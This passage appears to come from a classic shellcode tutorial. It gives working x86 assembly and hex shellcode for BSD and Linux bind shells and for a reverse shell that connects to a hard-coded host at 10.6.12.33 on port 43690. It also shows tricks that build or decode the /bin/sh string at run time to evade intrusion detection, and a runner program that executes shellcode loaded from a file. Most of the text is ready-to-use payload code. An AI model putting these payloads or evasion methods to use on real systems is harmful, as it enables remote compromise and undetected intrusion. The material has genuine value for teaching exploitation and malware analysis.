mov cl,3 ; Define our counter = 3 mov ebx,-1 ; The C code for our loop is: b = -1; for(int i =3;i>0;i--) { dup(cli,++b) }; mov edx,eax ; We store the file descriptor from accept() in edx. ; l00p: ; The loop code starts here. inc ebx ; This is the instead of the ++b code push ebx ; We push this value first because it represents the last argument push edx ; We push the second argument, the file descriptor from accept() mov al,90 ; We define the system call push eax ; int 0x80 ; And call the kernel to execute sub cl, 1 ; Substract 1 from cl jnz l00p ; This will continue the loop if cl != 0 ; ; Next the execve of /bin/sh xor eax,eax ; First we create some zero's push eax ; The 3e argument == NULL push eax ; So is the second push esi ; The first argument is a pointer to our string /bin/sh mov al,59 ; We define the system call, execve. push eax ; int 0x80 ; And execute callit: call doit db '/bin/sh'
And again the most important part, the result:
char shellcode[] = "\xeb\x6a\x5e\x31\xc0\x31\xdb\x88\x46\x07\xb0\x02\xcd\x80\x6a" "\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6" "\x46\x09\x02\x66\xc7\x46\x0a\xaa\xaa\x89\x46\x0c\x6a\x10\x8d" "\x46\x08\x50\x52\x31\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31" "\xc0\xb0\x6a\x50\xcd\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd" "\x80\xb1\x03\xbb\xff\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a" "\x50\xcd\x80\x80\xe9\x01\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b" "\x50\xcd\x80\xe8\x91\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
Linux socket code is a bit different than the BSD one. The problem is that Linux has one socket system call through which all other socket functions are reached (an API). This system call is called 'socketcall' and is executed with two arguments. The first argument is a number that represents a socket function (such as listen()). The second argument is a pointer to an array that contains the arguments for the function selected by the first argument.. ;-) Not very useful for shellcode development.
Socketcall is called like this:
socketcall(<function number>,<arguments for that function>)
Below are the available function numbers:
SYS_SOCKET 1
SYS_BIND 2
SYS_CONNECT 3
SYS_LISTEN 4
SYS_ACCEPT 5
SYS_GETSOCKNAME 6
SYS_GETPEERNAME 7
SYS_SOCKETPAIR 8
SYS_SEND 9
SYS_RECV 10
SYS_SENDTO 11
SYS_RECVFROM 12
SYS_SHUTDOWN 13
SYS_SETSOCKOPT 14
SYS_GETSOCKOPT 15
SYS_SENDMSG 16
SYS_RECVMSG 17
And of course the implementation:
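When reading socketcall based code it is handy to be able to translate between these names and numbers. The table above can be written down in C as follows. This is only a lookup sketch; the array and the function socketcall_number are names made up for this example and do not call the kernel.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* The socketcall sub-function names from the list above. The array
 * index is the function number, so index 0 is unused. */
static const char *const socketcall_names[] = {
    NULL,
    "SYS_SOCKET", "SYS_BIND", "SYS_CONNECT", "SYS_LISTEN",
    "SYS_ACCEPT", "SYS_GETSOCKNAME", "SYS_GETPEERNAME", "SYS_SOCKETPAIR",
    "SYS_SEND", "SYS_RECV", "SYS_SENDTO", "SYS_RECVFROM",
    "SYS_SHUTDOWN", "SYS_SETSOCKOPT", "SYS_GETSOCKOPT", "SYS_SENDMSG",
    "SYS_RECVMSG"
};

/* Hypothetical helper: returns the function number for a name such
 * as "SYS_LISTEN", or -1 if the name is not in the table. */
int socketcall_number(const char *name)
{
    assert(name != NULL);
    size_t count = sizeof socketcall_names / sizeof socketcall_names[0];
    for (size_t i = 1; i < count; i++) {
        if (strcmp(socketcall_names[i], name) == 0)
            return (int)i;
    }
    return -1;
}
```

socketcall_number("SYS_BIND") returns 2, which is the value that ends up in the first argument of socketcall when bind() is wanted.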
BITS 32 xor eax, eax ; NULL eax inc eax ; eax represents 1 now mov long [esi +12],eax ; mov ebx,eax inc eax mov long [esi +8],eax add al,0x04 mov long [esi +16],eax lea ecx,[esi +8] mov al,102 ; 102 == socketcall int 0x80 ; call the kernel mov edx,eax ; store the file descriptor in edx xor eax, eax ; Null eax ; Now lets make the serv_addr struct mov byte [esi + 8],0x02 ; This equals: serv_addr.sin_family=2 mov word [esi + 10],0xAAAA ; This equals: serv_addr.sin_port=0xAAAA mov long [esi + 12],eax ; This equals: serv_addr.sin_addr.s_addr=0 mov long [esi + 17],edx ; edx the file descriptor lea ecx,[esi + 8] ; load effective address of the struct mov long [esi + 21],ecx ; and store it in [esi + 21] inc ebx mov ecx,ebx add cl,14 mov long [esi + 25],ecx lea ecx,[esi +17] mov al,102 int 0x80 mov al,102 inc ebx inc ebx int 0x80 xor eax,eax inc ebx mov long [esi + 21],eax mov long [esi + 25],eax mov al,102 int 0x80 mov ebx,eax ; Save the file descriptor in ebx xor eax,eax ; NULL eax mov long [esi + 12], eax ; mov ecx,eax ; 0 == stdin mov al,63 ; dub2() int 0x80 ; Call kernel inc ecx ; 1 == stdout mov al,63 ; dub2() int 0x80 ; Call kernel inc ecx ; 2 == stderr mov al,63 ; dub2() int 0x80 ; Call kernel ; From here it is just a matter of jmp short callit ; executing a shell (/bin/bash) doit: pop esi xor eax, eax mov byte [esi + 9], al lea ebx, [esi] mov long [esi + 11], ebx mov long [esi + 15], eax mov byte al, 0x0b mov ebx, esi lea ecx, [esi + 11] lea edx, [esi + 15] int 0x80 callit: call doit db '/bin/bash'
In this example we will see how to create shellcode that creates a shell which connects back to a host you control. You'll be able to catch the shell by using a tool such as netcat. In this shellcode you will have to hardcode an IP address to connect to. It is also possible to add this IP address at the runtime of the exploit (which is a good idea). Please remember to convert the IP address ! For testing purposes the assembly and shellcode below will connect to 10.6.12.33 (a machine in my tiny test lab) on port 43690. Within the code this IP address is converted to: 0x210c060a . You can obtain this hex value pretty easily with perl:

su-2.05a# perl -e 'printf "0x" . "%02x"x4 ."\n",33,12,6,10'
0x210c060a
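The same conversion can be done in C. The sketch below assumes a little-endian x86 target, where a 32 bit value is stored lowest byte first; the function names ip_to_imm32 and port_to_imm16 are invented for this illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: packs the dotted quad a.b.c.d into a 32-bit
 * value so that, stored by a little-endian CPU, the bytes end up in
 * memory in network order a, b, c, d. */
uint32_t ip_to_imm32(uint8_t a, uint8_t b, uint8_t c, uint8_t d)
{
    return ((uint32_t)d << 24) | ((uint32_t)c << 16)
         | ((uint32_t)b << 8)  |  (uint32_t)a;
}

/* Hypothetical helper: swaps the two bytes of a port number for the
 * same reason (sin_port is kept in network byte order). */
uint16_t port_to_imm16(uint16_t port)
{
    return (uint16_t)((port << 8) | (port >> 8));
}
```

ip_to_imm32(10, 6, 12, 33) gives 0x210c060a, the same value as the perl one-liner. Port 43690 is 0xAAAA, which reads the same in both byte orders, so port_to_imm16(43690) returns 0xAAAA unchanged; most other ports will change. Keep in mind that an address with a 0 octet, such as 10.0.0.1, would put NULL bytes in the immediate.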
Just make sure you reverse the IP address like I did with 10.6.12.33. The C code on which the assembly is based:
#include<unistd.h>
#include<sys/socket.h>
#include<netinet/in.h>

int soc,rc;
struct sockaddr_in serv_addr;

int main()
{
    serv_addr.sin_family=2;
    serv_addr.sin_addr.s_addr=0x210c060a;
    serv_addr.sin_port=0xAAAA; /* port 43690 */
    soc=socket(2,1,6);
    rc = connect(soc, (struct sockaddr *)&serv_addr,0x10);
    dup2(soc,0);
    dup2(soc,1);
    dup2(soc,2);
    execve("/bin/sh",0,0);
}
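The constant 0x210c060a used for serv_addr.sin_addr.s_addr can also be derived programmatically instead of reversing the octets by hand. The following is only a minimal Python sketch of that conversion, assuming a little-endian x86 target; the helper name ip_to_le_constant is hypothetical and not part of the original text.

```python
import socket
import struct


def ip_to_le_constant(dotted: str) -> int:
    """Return the 32-bit value that a little-endian CPU stores as the
    address bytes in network order (hypothetical helper name)."""
    packed = socket.inet_aton(dotted)      # 10.6.12.33 -> bytes 0a 06 0c 21
    return struct.unpack("<I", packed)[0]  # read those bytes little-endian


if __name__ == "__main__":
    print(hex(ip_to_le_constant("10.6.12.33")))  # 0x210c060a
    print(int("AAAA", 16))                       # 43690, the port used here
```

Note that the port 0xAAAA consists of two identical bytes, so no byte swapping is visible for it in this example.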
And the assembly implementation:
BITS 32

jmp short callit
doit:
pop esi
xor eax, eax
mov byte [esi + 7], al

; Next code: socket(2,1,6)
push byte 0x06 ; The 3rd argument
push byte 0x01 ; The 2nd argument
push byte 0x02 ; The 1st argument
mov al,97 ; The system call number
push eax
int 0x80 ; And call the kernel

; Next code: connect(soc,(struct sockaddr *)&serv_addr,0x10);
mov edx,eax ; We store the file descriptor that was returned from socket() in edx
xor eax,eax ; Now we will create the sockaddr_in structure
mov byte [esi + 9],0x02 ; This equals: serv_addr.sin_family=2
mov word [esi + 10],0xAAAA ; This equals: serv_addr.sin_port=0xAAAA /* port 43690 */
mov long [esi + 12],0x210c060a ; This equals: serv_addr.sin_addr.s_addr=0x210c060a
push byte 0x10 ; We now start pushing the arguments, 0x10 is the 3rd one.
lea eax,[esi + 8] ; Get the address of our structure, arg 2 of connect() is a pointer.
push eax ; And push it on the stack as our second argument
push edx ; And we push the first argument, the file descriptor, last
xor eax,eax ; Clean up
mov al,98 ; System call 98 represents connect.
push eax
int 0x80 ; And call the kernel

; Next code: dup2(soc,0), dup2(soc,1) and dup2(soc,2)
; We will do this in a loop since this creates smaller code.
mov cl,3 ; Define our counter = 3
mov ebx,-1 ; The C code for our loop is: b = -1; for(int i =3;i>0;i--) { dup2(soc,++b) };
l00p: ; The loop code starts here.
inc ebx ; This is the ++b code
push ebx ; We push this value first because it represents the last argument
push edx ; We push the first argument, the file descriptor from socket()
mov al,90 ; We define the system call
push eax
int 0x80 ; And call the kernel to execute
sub cl, 1 ; Subtract 1 from cl
jnz l00p ; This will continue the loop if cl != 0

; Next the execve of /bin/sh
xor eax,eax ; First we create some zeros
push eax ; The 3rd argument == NULL
push eax ; So is the second
push esi ; The first argument is a pointer to our string /bin/sh
mov al,59 ; We define the system call, execve.
push eax
int 0x80 ; And execute

callit:
call doit
db '/bin/sh'
Shellcode generated from this assembly code will look like this. The IP address is the byte sequence \x0a\x06\x0c\x21, so you'll know where to search for it if you need to change it.
char shellcode[] =
"\xeb\x52\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0"
"\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6\x46\x09\x02\x66\xc7\x46"
"\x0a\xaa\xaa\xc7\x46\x0c\x0a\x06\x0c\x21\x6a\x10\x8d\x46\x08"
"\x50\x52\x31\xc0\xb0\x62\x50\xcd\x80\xb1\x03\xbb\xff\xff\xff"
"\xff\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01\x75\xf3\x31"
"\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\xa9\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68";
In some cases the buffer that causes the overflow is manipulated by the vulnerable program. This happens more often than you might think and makes exploiting overflows more difficult and often more fun! For example, many programs filter dots and slashes. Oh my GOD!! Isn't there something we can do about this? Yes there is ;-) We can use the almighty 'inc' instruction to increase the hex value of our ASCII character. Below is a simple example that illustrates how to do this, but first a part of Intel's description of 'inc':

Adds 1 to the destination operand, while preserving the state of the CF flag. The destination operand can be a register or a memory location.

Now an example of how to do this. Let's say we have the string:

db 'ABCD'

We can change B into a C by using:

inc byte [esi + 1]

This changes the hex value of B from 42 to 43, which represents C. A working example of the assembly code required to do this:

BITS 32

jmp short callit
doit:
pop esi
xor eax, eax
mov byte [esi + 7], al
mov byte [esi + 10], al
mov long [esi + 11], esi
lea ebx, [esi + 8]
mov long [esi + 15], ebx
mov long [esi + 19], eax
inc byte [esi] ; Now we have /bin.sh
inc byte [esi + 4] ; Now we have /bin/sh
mov byte al, 0x0b
mov ebx, esi
lea ecx, [esi + 11]
lea edx, [esi + 19]
int 0x80
callit:
call doit
db '.bin.sh#-i#AAAABBBBCCCC'

This can also be done to obfuscate parts of shellcode that might trigger IDS signatures. Instructions such as ADD, SUB, INC and DEC can be useful for this. By using a loop you can recover strings at run time, and by doing so you might be able to go undetected by an IDS or at least lower the risk of detection.
Have a look at the following example:

BITS 32

jmp short callit
doit:
pop esi
xor eax, eax
mov byte [esi + 7], al
lea ebx, [esi]
mov long [esi + 8], ebx
mov long [esi + 12], eax
mov cl,7 ; The loop begins here, we will loop 7 times
change:
dec byte [esi + ecx - 1 ] ; Change the byte on the right location
sub cl, 1 ; Update the counter 'cl'
jnz change ; Verify if we should break the loop
mov byte al, 0x0b
mov ebx, esi
lea ecx, [esi + 8]
lea edx, [esi + 12]
int 0x80
callit:
call doit
db '0cjo0ti#AAAABBBB'

The extra -1 in the line "dec byte [esi + ecx - 1 ]" is to make sure we also change the byte [esi + 0]. The above assembly code will generate shellcode that changes the string '0cjo0ti' to '/bin/sh' and which will then do an execve of it. The end result (after removing the #AAAABBBB chars) will be:

char shellcode[] =
"\xeb\x25\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb1\x07\xfe\x4c\x0e\xff\x80\xe9\x01\x75\xf7\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd6\xff\xff\xff\x30"
"\x63\x6a\x6f\x30\x74\x69";
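To check by hand what the 'change' loop leaves in memory, its effect can be replayed outside the target. The following is a rough Python sketch of that replay and not part of the original tool set; the function name decode_dec_loop is hypothetical, and the sketch only mimics the dec/sub/jnz sequence on a copy of the data.

```python
def decode_dec_loop(data: bytes, count: int = 7) -> bytes:
    """Replay 'dec byte [esi + ecx - 1]' for ecx = count .. 1
    on a copy of the data (hypothetical helper name)."""
    buf = bytearray(data)
    ecx = count                                   # mov cl,7
    while ecx != 0:
        buf[ecx - 1] = (buf[ecx - 1] - 1) & 0xFF  # dec byte [esi + ecx - 1]
        ecx -= 1                                  # sub cl, 1 / jnz change
    return bytes(buf)


if __name__ == "__main__":
    print(decode_dec_loop(b"0cjo0ti#AAAABBBB")[:7])  # b'/bin/sh'
```

The bytes after the first seven are left untouched, which matches the loop counter of 7 in the assembly.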
A nice FreeBSD example to hide the /bin/sh string in simple execve shellcode:
BITS 32

mov byte [esi + 5],0x73
mov byte [esi + 1],0x62
mov byte [esi],0x2f
xor eax, eax
mov byte [esi + 7], al
mov byte [esi + 2],0x69
push eax
mov byte [esi + 6],0x68
push eax
mov byte [esi + 4],0x2f
push esi
mov byte [esi + 3],0x6e
mov al,59
push eax
int 0x80
So the string /bin/sh is built character by character and not in the correct order. This will make it very hard for IDSs to detect the existence of the string! By creating an exploit that would shift the code shown in bold during execution you could make it extra hard to detect.
char shellcode[] =
"\xc6\x46\x05\x73\xc6\x46\x01\x62\xc6\x06\x2f\x31\xc0\x88\x46"
"\x07\xc6\x46\x02\x69\x50\xc6\x46\x06\x68\x50\xc6\x46\x04\x2f"
"\x56\xc6\x46\x03\x6e\xb0\x3b\x50\xcd\x80";
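When analysing code like this, it helps to replay the individual byte stores and see what ends up in the buffer. The Python sketch below does that for the 'mov byte' instructions of the FreeBSD example; the names replay_byte_stores and STORES are hypothetical, and the offset/value pairs are copied from the assembly in execution order.

```python
def replay_byte_stores(stores, size=8):
    """Apply (offset, value) byte stores to a scratch buffer in the given
    order and return the final contents (hypothetical helper name)."""
    buf = bytearray(b"?" * size)   # '?' marks bytes that were never written
    for offset, value in stores:
        buf[offset] = value
    return bytes(buf)


# (offset from esi, byte written), in the order the instructions execute
STORES = [
    (5, 0x73), (1, 0x62), (0, 0x2F), (7, 0x00),
    (2, 0x69), (6, 0x68), (4, 0x2F), (3, 0x6E),
]

if __name__ == "__main__":
    print(replay_byte_stores(STORES))  # b'/bin/sh\x00'
```

The order of the stores does not affect the final buffer, which is why the instructions can be shuffled freely.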
A more advanced method to obfuscate your code is by encoding the shellcode and decoding it at run time. While this seems very hard to do, trust me, it is not. If you want to encode shellcode, the best way to do this is with some help from a simple C program. More information on doing that will be released in another document on safemode.org.
Of course these are just simple examples of obfuscating code. They work nicely but aren't really efficient. If you are really interested in this stuff, have a look at K2's work at: http://www.ktwo.ca/security.html.
When your assembly code doesn't work, don't give up, because tools such as ptrace and ktrace can help you a lot! They can show you the exact arguments that are given to a system call, whether the system call was successful and if any value was returned.
For example, if the FreeBSD connect shellcode fails, you can see why! Just work like this:
ktrace ./s-proc -e <compiled connect assembly code>
kdump | more
snip snip snip
1830 process RET write 17/0x11
1830 process CALL socket(0x2,0x1,0x6)
1830 process RET socket 3
1830 process CALL connect(0x3,0x804b061,0x10)
1830 process RET connect -1 errno 61 Connection refused
Aha ! Connection refused.
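With longer traces it can be tedious to spot the failing call by eye. The following Python sketch filters kdump output for RET lines that report an error. It assumes the output looks exactly like the lines shown above (pid, process name, RET, call name, -1, errno, message); real kdump output may differ, and the names FAILED_RET and failed_calls are hypothetical.

```python
import re

# Matches failing "RET" lines in the format shown above, e.g.
# "1830 process RET connect -1 errno 61 Connection refused"
FAILED_RET = re.compile(
    r"^\s*(\d+)\s+(\S+)\s+RET\s+(\S+)\s+-1\s+errno\s+(\d+)\s+(.*)$"
)


def failed_calls(kdump_text):
    """Return (pid, syscall, errno, message) for every failed call."""
    results = []
    for line in kdump_text.splitlines():
        match = FAILED_RET.match(line)
        if match:
            pid, _process, name, err, message = match.groups()
            results.append((int(pid), name, int(err), message.strip()))
    return results


SAMPLE = """\
1830 process RET write 17/0x11
1830 process CALL socket(0x2,0x1,0x6)
1830 process RET socket 3
1830 process CALL connect(0x3,0x804b061,0x10)
1830 process RET connect -1 errno 61 Connection refused
"""

if __name__ == "__main__":
    for pid, name, err, message in failed_calls(SAMPLE):
        print(pid, name, err, message)
```

Keep in mind that errno numbers are platform specific: 61 is ECONNREFUSED on FreeBSD, while Linux uses 111 for the same error.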
If you are developing on Linux then strace is definitely your best friend ;-)
char shellcode[] =
"\x5e\x31\xc0\xb0\x24\xcd\x80\xb0\x24\xcd\x80\xb0\x58\xbb\xad"
"\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";
I just put it in a perl script like this:
#!/usr/bin/perl -w
$shellcode =
"\x5e\x31\xc0\xb0\x24\xcd\x80\xb0\x24\xcd\x80\xb0\x58\xbb\xad".
"\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";
open(FILE, ">shellcode.bin");
print FILE "$shellcode";
close(FILE);
I saved the file as ww.pl and disassembled it:
[10:50pm lappie] ./ww.pl
[10:50pm lappie] ndisasm -b 32 shellcode.bin
00000000  5E                pop esi
00000001  31C0              xor eax,eax
00000003  B024              mov al,0x24
00000005  CD80              int 0x80
00000007  B024              mov al,0x24
00000009  CD80              int 0x80
0000000B  B058              mov al,0x58
0000000D  BBADDEE1FE        mov ebx,0xfee1dead
00000012  B969191228        mov ecx,0x28121969
00000017  BA67452301        mov edx,0x1234567
0000001C  CD80              int 0x80
Et voila, here is the assembly. Now it is really easy to determine what kind of shellcode this is and what technique is being used.
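The constants in the listing can be matched against known values to identify the code. The Python sketch below does this, assuming the shellcode targets Linux on i386 (my reading of the syscall numbers and magic values, the text does not state it). There 0x24 is sync, 0x58 is reboot, and the three immediates are the reboot magic numbers plus the restart command from <linux/reboot.h>. The names imm32 and describe are hypothetical, and the offsets are taken from the ndisasm listing above.

```python
import struct

SHELLCODE = bytes.fromhex(
    "5e31c0b024cd80b024cd80b058bbaddee1feb969191228ba67452301cd80"
)

# Linux i386 syscall numbers and reboot(2) constants (assumed target)
SYSCALLS = {0x24: "sync", 0x58: "reboot"}
REBOOT_CONSTANTS = {
    0xFEE1DEAD: "LINUX_REBOOT_MAGIC1",
    0x28121969: "LINUX_REBOOT_MAGIC2",
    0x01234567: "LINUX_REBOOT_CMD_RESTART",
}


def imm32(code, offset):
    """Read a little-endian 32-bit immediate at the given offset."""
    return struct.unpack_from("<I", code, offset)[0]


def describe(code):
    """Name the syscalls and the ebx/ecx/edx immediates of this sample."""
    calls = [SYSCALLS.get(code[i], hex(code[i])) for i in (0x04, 0x08, 0x0C)]
    args = [REBOOT_CONSTANTS.get(imm32(code, off), hex(imm32(code, off)))
            for off in (0x0E, 0x13, 0x18)]
    return calls, args


if __name__ == "__main__":
    calls, args = describe(SHELLCODE)
    print(calls)
    print(args)
```

Under that assumption the sample calls sync twice and then reboot with the restart command.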
/*
 * Generic program for testing shellcode byte arrays.
 * Created by zillion and EVL
 *
 * Safemode.org !! Safemode.org !!
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <errno.h>

/*
 * Print message
 */
static void
croak(const char *msg) {
    fprintf(stderr, "%s\n", msg);
    fflush(stderr);
}

/*
 * Educate user.
 */
static void
usage(const char *prgnam) {
    fprintf(stderr, "\nExecute code : %s -e <file-containing-shellcode>\n", prgnam);
    fprintf(stderr, "Convert code : %s -p <file-containing-shellcode> \n\n", prgnam);
    fflush(stderr);
    exit(1);
}

/*
 * Signal error and bail out.
 */
static void
barf(const char *msg) {
    perror(msg);
    exit(1);
}

/*
 * Main code starts here
 */
int
main(int argc, char **argv) {
    FILE *fp;
    void *code;
    int arg;
    int i;
    int l;
    int m = 15; /* max # of bytes to print on one line */

    struct stat sbuf;
    long flen; /* Note: assume files are < 2**32 bytes long ;-) */
    void (*fptr)(void);

    if(argc < 3) usage(argv[0]);
    if(stat(argv[2], &sbuf)) barf("failed to stat file");
    flen = (long) sbuf.st_size;
    if(!(code = malloc(flen))) barf("failed to grab required memory");
    if(!(fp = fopen(argv[2], "rb"))) barf("failed to open file");
    if(fread(code, 1, flen, fp) != (size_t) flen) barf("failed to slurp file");
    if(fclose(fp)) barf("failed to close file");

    while ((arg = getopt (argc, argv, "e:p:")) != -1){
        switch (arg){
        case 'e':
            croak("Calling code ...");
            fptr = (void (*)(void)) code;
            (*fptr)();
            break;
        case 'p':
            printf("\n\nchar shellcode[] =\n");
            l = m;
            for(i = 0; i < flen; ++i) {
                if(l >= m) {
                    if(i) printf("\"\n");
                    printf( "\t\"");
                    l = 0;
                }
                ++l;
                printf("\\x%02x", ((unsigned char *)code)[i]);
            }
            printf("\";\n\n\n");
            break;
        default :
            usage(argv[0]);
        }
    }

    return 0;
}
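For quick inspection without compiling the tool, the conversion done by the -p option can be approximated in a few lines of Python. This is only a sketch of the formatting step (15 bytes per line, as set by the variable m above), it does not execute anything, and the function name format_c_array is hypothetical. Its output omits the blank lines that s-proc prints around the array.

```python
def format_c_array(code: bytes, per_line: int = 15) -> str:
    """Render raw bytes as a C 'char shellcode[]' definition,
    roughly as 's-proc -p' does (hypothetical helper name)."""
    lines = ["char shellcode[] ="]
    for start in range(0, len(code), per_line):
        chunk = code[start:start + per_line]
        escaped = "".join("\\x%02x" % byte for byte in chunk)
        lines.append('\t"' + escaped + '"')
    return "\n".join(lines) + ";"


if __name__ == "__main__":
    # Two bytes only, to keep the demonstration short
    print(format_c_array(b"\xcd\x80"))
```

To convert a file, read it in binary mode and pass its contents to the function.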